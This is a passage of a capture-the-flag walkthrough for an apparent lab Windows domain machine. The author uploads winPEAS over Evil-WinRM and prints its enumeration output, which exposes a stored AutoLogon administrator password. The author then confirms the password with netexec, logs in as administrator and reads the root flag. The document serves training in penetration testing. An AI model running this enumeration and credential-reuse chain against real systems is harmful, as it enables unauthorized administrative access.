Info: Establishing connection to remote endpoint

                                       
*Evil-WinRM* PS C:\Users\sysadmin\Documents> upload winPEASx64_ofs.exe
                                        
Info: Uploading /home/luis/Descargas/winPEASx64_ofs.exe to C:\Users\sysadmin\Documents\winPEASx64_ofs.exe
                                        
Data: 13347496 bytes of 13347496 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\sysadmin\Documents> ls


    Directory: C:\Users\sysadmin\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/28/2025  12:47 PM       10010624 winPEASx64_ofs.exe

Let's go to execute to see if its possible discover any passwords, paths etc as you can see below.

*Evil-WinRM* PS C:\Users\sysadmin\Documents> ./winPEASx64_ofs.exe
 [!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search might take several minutes. For help, run winpeass.exe --help
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD

               ((((((((((((((((((((((((((((((((
        (((((((((((((((((((((((((((((((((((((((((((
      ((((((((((((((**********/##########(((((((((((((
    ((((((((((((********************/#######(((((((((((
    ((((((((******************/@@@@@/****######((((((((((
    ((((((********************@@@@@@@@@@/***,####((((((((((
    (((((********************/@@@@@%@@@@/********##(((((((((
    (((############*********/%@@@@@@@@@/************((((((((
    ((##################(/******/@@@@@/***************((((((
    ((#########################(/**********************(((((
    ((##############################(/*****************(((((
    ((###################################(/************(((((
    ((#######################################(*********(((((
    ((#######(,.***.,(###################(..***.*******(((((
    ((#######*(#####((##################((######/(*****(((((
    ((###################(/***********(##############()(((((
    (((#####################/*******(################)((((((
    ((((############################################)((((((
    (((((##########################################)(((((((
    ((((((########################################)(((((((
    ((((((((####################################)((((((((
    (((((((((#################################)(((((((((
        ((((((((((##########################)(((((((((
              ((((((((((((((((((((((((((((((((((((((
                 ((((((((((((((((((((((((((((((

ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own devices and/or with the device owner's permission.

  WinPEAS-ng by @hacktricks_live

       /---------------------------------------------------------------------------------\
       |                             Do you like PEASS?                                  |
       |---------------------------------------------------------------------------------|
       |         Learn Cloud Hacking       :     training.hacktricks.xyz                 |
       |         Follow on Twitter         :     @hacktricks_live                        |
       |         Respect on HTB            :     SirBroccoli                             |
       |---------------------------------------------------------------------------------|
       |                                 Thank you!                                      |
       \---------------------------------------------------------------------------------/

  [+] Legend:
         Red                Indicates a special privilege over an object or something is misconfigured
         Green              Indicates that some protection is enabled or something is well configured
         Cyan               Indicates active users
         Blue               Indicates disabled users
         LightYellow        Indicates links

 You can find a Windows local PE Checklist here: https://book.hacktricks.wiki/en/windows-hardening/checklist-windows-privilege-escalation.html
   Creating Dynamic lists, this could take a while, please wait...
   - Loading sensitive_files yaml definitions file...
   - Loading regexes yaml definitions file...
   - Checking if domain...
   - Getting Win32_UserAccount info...
Error while getting Win32_UserAccount info: System.Management.ManagementException: Access denied
   at System.Management.ThreadDispatch.Start()
   at System.Management.ManagementScope.Initialize()
   at System.Management.ManagementObjectSearcher.Initialize()
   at System.Management.ManagementObjectSearcher.Get()
   at winPEAS.Checks.Checks.a(Boolean A_0)
   - Creating current user groups list...
   - Creating active users list (local only)...
  [X] Exception: Object reference not set to an instance of an object.
   - Creating disabled users list...
  [X] Exception: Object reference not set to an instance of an object.
   - Admin users list...
  [X] Exception: Object reference not set to an instance of an object.
   - Creating AppLocker bypass list...
   - Creating files/directories list for search...


ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ System Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

ÉÍÍÍÍÍÍÍÍÍ͹ Basic System Information
È Check if the Windows versions is vulnerable to some known exploit https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#version-exploits
  [X] Exception: Access is denied

ÉÍÍÍÍÍÍÍÍÍ͹ Showing All Microsoft Updates
  [X] Exception: Creating an instance of the COM component with CLSID {B699E5E8-67FF-4177-88B0-3684A3388BFB} from the IClassFactory failed due to the following error: 80070005 Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED)).

ÉÍÍÍÍÍÍÍÍÍ͹ System Last Shutdown Date/time (from Registry)

    Last Shutdown Date/time        :    6/28/2025 1:04:01 PM

ÉÍÍÍÍÍÍÍÍÍ͹ User Environment Variables
È Check for some passwords or keys in the env variables 
    COMPUTERNAME: CHANGE
    PUBLIC: C:\Users\Public
    LOCALAPPDATA: C:\Users\sysadmin\AppData\Local
    PSModulePath: C:\Users\sysadmin\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    PROCESSOR_ARCHITECTURE: AMD64
    Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\sysadmin\AppData\Local\Microsoft\WindowsApps
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    ProgramFiles(x86): C:\Program Files (x86)
    PROCESSOR_LEVEL: 6
    ProgramFiles: C:\Program Files
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
    USERPROFILE: C:\Users\sysadmin
    SystemRoot: C:\Windows
    ALLUSERSPROFILE: C:\ProgramData
    DriverData: C:\Windows\System32\Drivers\DriverData
    ProgramData: C:\ProgramData
    PROCESSOR_REVISION: 7e05
    USERNAME: sysadmin
    CommonProgramW6432: C:\Program Files\Common Files
    CommonProgramFiles: C:\Program Files\Common Files
    OS: Windows_NT
    PROCESSOR_IDENTIFIER: Intel64 Family 6 Model 126 Stepping 5, GenuineIntel
    ComSpec: C:\Windows\system32\cmd.exe
    SystemDrive: C:
    TEMP: C:\Users\sysadmin\AppData\Local\Temp
    NUMBER_OF_PROCESSORS: 1
    APPDATA: C:\Users\sysadmin\AppData\Roaming
    TMP: C:\Users\sysadmin\AppData\Local\Temp
    ProgramW6432: C:\Program Files
    windir: C:\Windows
    USERDOMAIN: MEGACHANGE
    USERDNSDOMAIN: megachange.nyx

ÉÍÍÍÍÍÍÍÍÍ͹ System Environment Variables
È Check for some passwords or keys in the env variables 
    ComSpec: C:\Windows\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    OS: Windows_NT
    Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\Windows\TEMP
    TMP: C:\Windows\TEMP
    USERNAME: SYSTEM
    windir: C:\Windows
    NUMBER_OF_PROCESSORS: 1
    PROCESSOR_LEVEL: 6
    PROCESSOR_IDENTIFIER: Intel64 Family 6 Model 126 Stepping 5, GenuineIntel
    PROCESSOR_REVISION: 7e05

ÉÍÍÍÍÍÍÍÍÍ͹ Audit Settings
È Check what is being logged 
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Audit Policy Settings - Classic & Advanced

ÉÍÍÍÍÍÍÍÍÍ͹ WEF Settings
È Windows Event Forwarding, is interesting to know were are sent the logs 
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ LAPS Settings
È If installed, local administrator password is changed frequently and is restricted by ACL 
    LAPS Enabled: LAPS not installed

ÉÍÍÍÍÍÍÍÍÍ͹ Wdigest
È If enabled, plain-text crds could be stored in LSASS https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#wdigest
    Wdigest is not enabled

ÉÍÍÍÍÍÍÍÍÍ͹ LSA Protection
È If enabled, a driver is needed to read LSASS memory (If Secure Boot or UEFI, RunAsPPL cannot be disabled by deleting the registry key) https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#lsa-protection
    LSA Protection is not enabled

ÉÍÍÍÍÍÍÍÍÍ͹ Credentials Guard
È If enabled, a driver is needed to read LSASS memory https://book.hacktricks.wiki/windows-hardening/stealing-credentials/credentials-protections#credentials-guard
    CredentialGuard is not enabled

ÉÍÍÍÍÍÍÍÍÍ͹ Cached Creds
È If > 0, credentials will be cached in the registry and accessible by SYSTEM user https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#cached-credentials
    cachedlogonscount is 10

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating saved credentials in Registry (CurrentPass)

ÉÍÍÍÍÍÍÍÍÍ͹ AV Information
  [X] Exception: Invalid namespace 
    No AV was detected!!
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Windows Defender configuration
  Local Settings
  Group Policy Settings

ÉÍÍÍÍÍÍÍÍÍ͹ UAC Status
È If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#from-administrator-medium-to-high-integrity-level--uac-bypasss
    ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
    EnableLUA: 1
    LocalAccountTokenFilterPolicy: 
    FilterAdministratorToken: 1
      [*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken == 1.
      [-] No local accounts can be used for lateral movement.

ÉÍÍÍÍÍÍÍÍÍ͹ PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.17763.1
    PowerShell Core Version: 
    Transcription Settings: 
    Module Logging Settings: 
    Scriptblock Logging Settings: 
    PS history file: 
    PS history size: 

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating PowerShell Session Settings using the registry
      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍ͹ PS default transcripts history
È Read the PS history inside these files (if any)

ÉÍÍÍÍÍÍÍÍÍ͹ HKCU Internet Settings
    DisableCachingOfSSLPages: 0
    IE5_UA_Backup_Flag: 5.0
    PrivacyAdvanced: 1
    SecureProtocols: 2048
    User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
    CertificateRevocation: 1
    ZonesSecurityUpgrade: System.Byte[]

ÉÍÍÍÍÍÍÍÍÍ͹ HKLM Internet Settings
    ActiveXCache: C:\Windows\Downloaded Program Files
    CodeBaseSearchPath: CODEBASE
    EnablePunycode: 1
    MinorVersion: 0
    WarnOnIntranet: 1

ÉÍÍÍÍÍÍÍÍÍ͹ Drives Information
È Remember that you should search more info inside the other drives 
    C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 34 GB)(Permissions: Users [Allow: AppendData/CreateDirectories])
    D:\ (Type: CDRom)

ÉÍÍÍÍÍÍÍÍÍ͹ Checking WSUS
È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#wsus
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Checking KrbRelayUp
È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#krbrelayup
  The system is inside a domain (MEGACHANGE) so it could be vulnerable.
È You can try https://github.com/Dec0ne/KrbRelayUp to escalate privileges

ÉÍÍÍÍÍÍÍÍÍ͹ Checking If Inside Container
È If the binary cexecsvc.exe or associated service exists, you are inside Docker 
You are NOT inside a container

ÉÍÍÍÍÍÍÍÍÍ͹ Checking AlwaysInstallElevated
È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated
    AlwaysInstallElevated isn't available

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerate LSA settings - auth packages included

    auditbasedirectories                 :       0
    auditbaseobjects                     :       0
    Bounds                               :       00-30-00-00-00-20-00-00
    crashonauditfail                     :       0
    fullprivilegeauditing                :       00
    LimitBlankPasswordUse                :       1
    NoLmHash                             :       1
    Security Packages                    :       ""
    Notification Packages                :       rassfm,scecli
    Authentication Packages              :       msv1_0
    LsaPid                               :       528
    LsaCfgFlagsDefault                   :       0
    SecureBoot                           :       1
    ProductType                          :       7
    disabledomaincreds                   :       0
    everyoneincludesanonymous            :       0
    forceguest                           :       0
    restrictanonymous                    :       0
    restrictanonymoussam                 :       1

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating NTLM Settings
  LanmanCompatibilityLevel    :  (Send NTLMv2 response only - Win7+ default)


  NTLM Signing Settings
      ClientRequireSigning    : False
      ClientNegotiateSigning  : True
      ServerRequireSigning    : True
      ServerNegotiateSigning  : True
      LdapSigning             : Negotiate signing (Negotiate signing)

  Session Security
      NTLMMinClientSec        : 536870912 (Require 128-bit encryption)
      NTLMMinServerSec        : 536870912 (Require 128-bit encryption)


  NTLM Auditing and Restrictions
      InboundRestrictions     :  (Not defined)
      OutboundRestrictions    :  (Not defined)
      InboundAuditing         :  (Not defined)
      OutboundExceptions      :

ÉÍÍÍÍÍÍÍÍÍ͹ Display Local Group Policy settings - local users/machine

ÉÍÍÍÍÍÍÍÍÍ͹ Checking AppLocker effective policy
   AppLockerPolicy version: 1
   listing rules:



ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Printers (WMI)

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Named Pipes
  Name                                                                                                 CurrentUserPerms                                                       Sddl

  eventlog                                                                                             Everyone [Allow: WriteData/CreateFiles]                                O:LSG:LSD:P(A;;0x12019b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)

  ROUTER                                                                                               Everyone [Allow: WriteData/CreateFiles]                                O:SYG:SYD:P(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;SY)

  RpcProxy\49674                                                                                       Everyone [Allow: WriteData/CreateFiles]                                O:BAG:SYD:(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;BA)

  RpcProxy\593                                                                                         Everyone [Allow: WriteData/CreateFiles]                                O:NSG:NSD:(A;;0x12019b;;;WD)(A;;RC;;;OW)(A;;0x12019b;;;AN)(A;;FA;;;S-1-5-80-521322694-906040134-3864710659-1525148216-3451224162)(A;;FA;;;S-1-5-80-979556362-403687129-3954533659-2335141334-1547273080)


ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating AMSI registered providers
    Provider:       {2781761E-28E0-4109-99FE-B9D127C57AFE}
    Path:

   =================================================================================================


ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Sysmon configuration
      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Sysmon process creation logs (1)
      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍ͹ Installed .NET versions



ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Interesting Events information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

ÉÍÍÍÍÍÍÍÍÍ͹ Printing Explicit Credential Events (4648) for last 30 days - A process logged on using plaintext credentials

      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍ͹ Printing Account Logon Events (4624) for the last 10 days.

      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍ͹ Process creation events - searching logs (EID 4688) for sensitive data.

      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍ͹ PowerShell events - script block logs (EID 4104) - searching for sensitive data.

  [X] Exception: Attempted to perform an unauthorized operation.

ÉÍÍÍÍÍÍÍÍÍ͹ Displaying Power off/on events for last 5 days

System.UnauthorizedAccessException: Attempted to perform an unauthorized operation.
   at System.Diagnostics.Eventing.Reader.EventLogException.Throw(Int32 errorCode)
   at System.Diagnostics.Eventing.Reader.NativeWrapper.EvtQuery(EventLogHandle session, String path, String query, Int32 flags)
   at System.Diagnostics.Eventing.Reader.EventLogReader..ctor(EventLogQuery eventQuery, EventBookmark bookmark)
   at winPEAS.Helpers.MyUtils.GetEventLogReader(String path, String query, String computerName)
   at hq.a.b()
   at i3.a()


ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Users Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

ÉÍÍÍÍÍÍÍÍÍ͹ Users
È Check if you have some admin equivalent privileges https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#users--groups
  [X] Exception: Object reference not set to an instance of an object.
  Current user: sysadmin
  Current groups: Domain Users, Everyone, Builtin\Remote Management Users, Users, Builtin\Pre-Windows 2000 Compatible Access, Network, Authenticated Users, This Organization, NTLM Authentication
   =================================================================================================

    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Current User Idle Time
   Current User   :     MEGACHANGE\sysadmin
   Idle Time      :     00h:44m:21s:000ms

ÉÍÍÍÍÍÍÍÍÍ͹ Display Tenant information (DsRegCmd.exe /status)
   Tenant is NOT Azure AD Joined.

ÉÍÍÍÍÍÍÍÍÍ͹ Current Token privileges
È Check if you can escalate privilege using some enabled token https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#token-manipulation
    SeMachineAccountPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
    SeIncreaseWorkingSetPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED

ÉÍÍÍÍÍÍÍÍÍ͹ Clipboard text

ÉÍÍÍÍÍÍÍÍÍ͹ Logged users
  [X] Exception: Access denied 
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Display information about local users
   Computer Name           :   CHANGE
   User Name               :   Administrator
   User Id                 :   500
   Is Enabled              :   True
   User Type               :   Administrator
   Comment                 :   Built-in account for administering the computer/domain
   Last Logon              :   3/7/2025 9:04:04 PM
   Logons Count            :   15
   Password Last Set       :   3/7/2025 7:53:34 PM

   =================================================================================================

   Computer Name           :   CHANGE
   User Name               :   Guest
   User Id                 :   501
   Is Enabled              :   False
   User Type               :   Guest
   Comment                 :   Built-in account for guest access to the computer/domain
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   1/1/1970 12:00:00 AM

   =================================================================================================

   Computer Name           :   CHANGE
   User Name               :   krbtgt
   User Id                 :   502
   Is Enabled              :   False
   User Type               :   User
   Comment                 :   Key Distribution Center Service Account
   Last Logon              :   1/1/1970 12:00:00 AM
   Logons Count            :   0
   Password Last Set       :   3/7/2025 2:00:47 PM

   =================================================================================================

   Computer Name           :   CHANGE
   User Name               :   alfredo
   User Id                 :   1103
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   6/28/2025 1:01:08 PM
   Logons Count            :   2
   Password Last Set       :   3/7/2025 7:57:14 PM

   =================================================================================================

   Computer Name           :   CHANGE
   User Name               :   sysadmin
   User Id                 :   1104
   Is Enabled              :   True
   User Type               :   User
   Comment                 :
   Last Logon              :   6/28/2025 12:34:39 PM
   Logons Count            :   0
   Password Last Set       :   6/28/2025 12:33:31 PM

   =================================================================================================


ÉÍÍÍÍÍÍÍÍÍ͹ RDP Sessions
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Ever logged users
  [X] Exception: Access denied 
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Home folders found
    C:\Users\Administrator
    C:\Users\All Users
    C:\Users\Default
    C:\Users\Default User
    C:\Users\Public
    C:\Users\sysadmin : sysadmin [Allow: AllAccess]

Gotcha! I have discovered the user and password from administrator as you can see below in this path which is:
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  MEGACHANGE
    DefaultUserName               :  administrator
    DefaultPassword               :  d0m@in_c0ntr0ll3r

Now, we have to verify if the password discovered is correct with the command you can see below.
┌──(root㉿kali)-[/home/luis/Descargas]
└─# netexec smb  192.168.88.7 -u administrator -p d0m@in_c0ntr0ll3r
SMB         192.168.88.7    445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB         192.168.88.7    445    CHANGE           [+] megachange.nyx\administrator:d0m@in_c0ntr0ll3r (Pwn3d!)

┌──(root㉿kali)-[/home/luis/Descargas]
└─# netexec smb  evil-winrm 192.168.88.7 -u administrator -p d0m@in_c0ntr0ll3r
SMB         192.168.88.7    445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB         192.168.88.7    445    CHANGE           [+] megachange.nyx\administrator:d0m@in_c0ntr0ll3r (Pwn3d!)
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Now, we should be able to try if we can enter in the windows machine, for it, should execute this command you can see below which is:
evil-winrm -i 192.168.88.7 -u administrator -p d0m@in_c0ntr0ll3r

┌──(root㉿kali)-[/home/luis/Descargas]
└─# evil-winrm -i 192.168.88.7 -u administrator -p d0m@in_c0ntr0ll3r
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> ls


    Directory: C:\Users\Administrator


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---         3/7/2025   9:25 PM                3D Objects
d-r---         3/7/2025   9:25 PM                Contacts
d-r---         3/7/2025   9:25 PM                Desktop
d-r---         3/7/2025   9:25 PM                Documents
d-r---         3/7/2025   9:25 PM                Downloads
d-r---         3/7/2025   9:25 PM                Favorites
d-r---         3/7/2025   9:25 PM                Links
d-r---         3/7/2025   9:25 PM                Music
d-r---         3/7/2025   9:25 PM                Pictures
d-r---         3/7/2025   9:25 PM                Saved Games
d-r---         3/7/2025   9:25 PM                Searches
d-r---         3/7/2025   9:25 PM                Videos


*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls

Gotcha! I have to discovered the root flag you can see below in this path which is:
C:\Users\Administrator\Desktop\root.txt
    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/7/2025   6:23 PM             70 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
79bf6f60850f10211c290be19ccf8b95
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami
megachange\administrator

Thank you very much for reading this article

I hope you liked and learned something new

This article has been done with ethical proposes

Good Hack